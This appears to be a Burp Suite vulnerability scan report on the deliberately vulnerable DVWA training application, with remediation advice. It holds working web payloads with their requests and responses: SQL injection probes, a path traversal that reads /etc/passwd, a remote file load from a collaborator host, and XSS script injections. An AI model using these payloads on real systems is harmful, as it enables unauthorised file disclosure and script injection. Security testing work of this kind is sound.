Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 610
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''294674''' at line 1 in /var/www/html/vulnerabilities/sqli_blind/source/low.php:12
Stack trace:
#0 /
...[SNIP]...
Request 2
GET /vulnerabilities/sqli_blind/?id=294674''&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=89f91250018af100116bd6bd0a002a6a
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:00 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
3. File path traversal
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The page parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
The payload ../../../../../../../../../../../../../../../../etc/passwd was submitted in the page parameter. The requested file was returned in the application's response.
Issue background
File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.
This is typically a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
Issue remediation
Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved by referencing known files via an index number rather than their name, and using application-generated filenames to save user-supplied file content.
If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defense can be employed to prevent path traversal attacks:
- User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
- After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the application's input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
- The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/fi/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4582
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/
...[SNIP]...
x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
<br />
...[SNIP]...
4. Out-of-band resource load (HTTP)
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response.
The payload http://h8qkwkma3dg5fmqg6ehw79nca3gw4rshg83yrn.oastify.com/?file1.php was submitted in the page parameter.
The application performed an HTTP request to the specified domain. The response from that request was then included in the application's own response.
Issue background
Out-of-band resource load arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s). The ability to trigger arbitrary out-of-band resource load does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application.
However, in many cases, it can indicate a vulnerability with serious consequences.
The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy.
By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with.
This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself.
Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.
Additionally, the application's processing of web content that is retrieved from arbitrary URLs exposes some important and non-conventional attack surface.
An attacker can deploy a web server that returns malicious content, and then induce the application to retrieve and process that content.
This processing might give rise to the types of input-based vulnerabilities that are normally found when unexpected input is submitted directly in requests to the application.
The out-of-band attack surface that the application exposes should be thoroughly tested for these types of vulnerabilities.
Issue remediation
You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary out-of-band resource load is intended behavior.
If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures.
These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.
You should also ensure that content retrieved from other systems is processed in a safe manner, with the usual precautions that are applicable when processing input from direct incoming web requests.
If the ability to trigger arbitrary out-of-band resource load is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/fi/?page=http%3a%2f%2fh8qkwkma3dg5fmqg6ehw79nca3gw4rshg83yrn.oastify.com%2f%3ffile1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 3975
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<html><body>vgsii9v5kr93m8q3ai58vfzjlgngigjfigz</body></html><br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at http://h8qkwkma3dg5fmqg6ehw79nca3gw4r
...[SNIP]...
Collaborator HTTP interaction
The Collaborator server received an HTTP request.
The request was received from IP address 178.79.134.182:55188 at 2024-Oct-21 09:40:08.887 UTC.Request to Collaborator
GET /?file1.php HTTP/1.1
Host: h8qkwkma3dg5fmqg6ehw79nca3gw4rshg83yrn.oastify.com
Connection: close
Response from Collaborator
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 61
<html><body>vgsii9v5kr93m8q3ai58vfzjlgngigjfigz</body></html>
5. Cross-site scripting (reflected)
Previous
Next
There are 27 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting
attacks can be prevented using two layers of defenses:
- Input should be validated as strictly as possible on arrival, given the kind of content that
it is expected to contain. For example, personal names should consist of alphabetical
and a small range of typographical characters, and be relatively short; a year of birth
should consist of exactly four numerals; email addresses should match a well-defined
regular expression. Input which fails the validation should be rejected, not sanitized.
- User input should be HTML-encoded at any point where it is copied into
application responses. All HTML metacharacters, including < > " ' and =, should be
replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using
a restricted subset of HTML tags and attributes (for example, blog comments which
allow limited formatting and linking), it is necessary to parse the supplied HTML to
validate that it does not use any dangerous syntax; this is a non-trivial task.
References
Vulnerability classifications
5.1. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The value of the include request parameter is copied into the response within the hostname of a URL from which JavaScript will be loaded. The payload http://brxeuwqdgl was submitted in the include parameter. This input was echoed unmodified within the "src" attribute of a "script" tag.
This proof-of-concept attack demonstrates that it is possible to modify the URL to reference an external host and so inject arbitrary JavaScript in the response.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ca8657160a0751a2610b487fcc2f6090
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=http%3a%2f%2fbrxeuwqdgl
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4175
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
<script src='http://brxeuwqdgl'>
...[SNIP]...
5.2. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The value of the include request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload m3z1x'><script>alert(1)</script>ct4g8 was submitted in the include parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ca8657160a0751a2610b487fcc2f6090
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlUm3z1x'%3e%3cscript%3ealert(1)%3c%2fscript%3ect4g8
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4201
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
<script src='WvEMlUm3z1x'><script>alert(1)</script>ct4g8'>
...[SNIP]...
5.3. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php [username parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Issue detail
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload a7aqz<script>alert(1)</script>oz92i was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=a7aqz%3cscript%3ealert(1)%3c%2fscript%3eoz92i&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:54 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1114
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
<h3 class="loginFail">Wrong password for 'a7aqz<script>alert(1)</script>oz92i'</h3>
...[SNIP]...
5.4. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload tb6hu<script>alert(1)</script>rxsh0 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /vulnerabilities/view_source.php?id=brutetb6hu%3cscript%3ealert(1)%3c%2fscript%3erxsh0&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1018
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<h2>vulnerabilities/brutetb6hu<script>alert(1)</script>rxsh0/source/low.php</h2>
...[SNIP]...
5.5. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The value of the id request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 82446';alert(1)//399 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the input is echoed into an existing event handler within the response. JavaScript injected into this context will only execute when the relevant event occurs. This may require some action by the victim user, and may hinder exploitation. It may be possible to manually fine tune an attack to increase the likelihood that the event occurs.
Remediation detail
Echoing user-controllable data within an event handler is inherently dangerous and can make XSS attacks difficult to prevent. The defense of HTML-encoding user-controllable data is not effective in this context, because browsers will HTML-decode the event handler string before executing it as script. If at all possible, the application should avoid echoing user data within this context.
Request 1
GET /vulnerabilities/view_source.php?id=brute82446'%3balert(1)%2f%2f399&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:29 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 988
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<input type="button" value="Compare All Levels" onclick="window.location.href='view_source_all.php?id=brute82446';alert(1)//399'">
...[SNIP]...
5.6. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The value of the security request parameter is copied into the HTML document as plain text between tags. The payload vpgqp<script>alert(1)</script>kynp5 was submitted in the security parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=lowvpgqp%3cscript%3ealert(1)%3c%2fscript%3ekynp5 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 973
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<h2>vulnerabilities/brute/source/lowvpgqp<script>alert(1)</script>kynp5.php</h2>
...[SNIP]...
5.7. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [name parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue detail
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload wanqi<script>alert(1)</script>ch9zz was submitted in the name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCgwanqi%3cscript%3ealert(1)%3c%2fscript%3ech9zz HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8541ed0d285b32dcaacfa09899f20c08
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4276
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
<pre>Hello YIQlvlCgwanqi<script>alert(1)</script>ch9zz</pre>
...[SNIP]...
5.8. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [mtxMessage parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the mtxMessage request parameter is copied into the HTML document as plain text between tags. The payload uktj6<script>alert(1)</script>hl02e was submitted in the mtxMessage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c5fb6727cef2632c9d9a075ed21a483b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQwuktj6%3cscript%3ealert(1)%3c%2fscript%3ehl02e&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:41 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5066
Connection: close
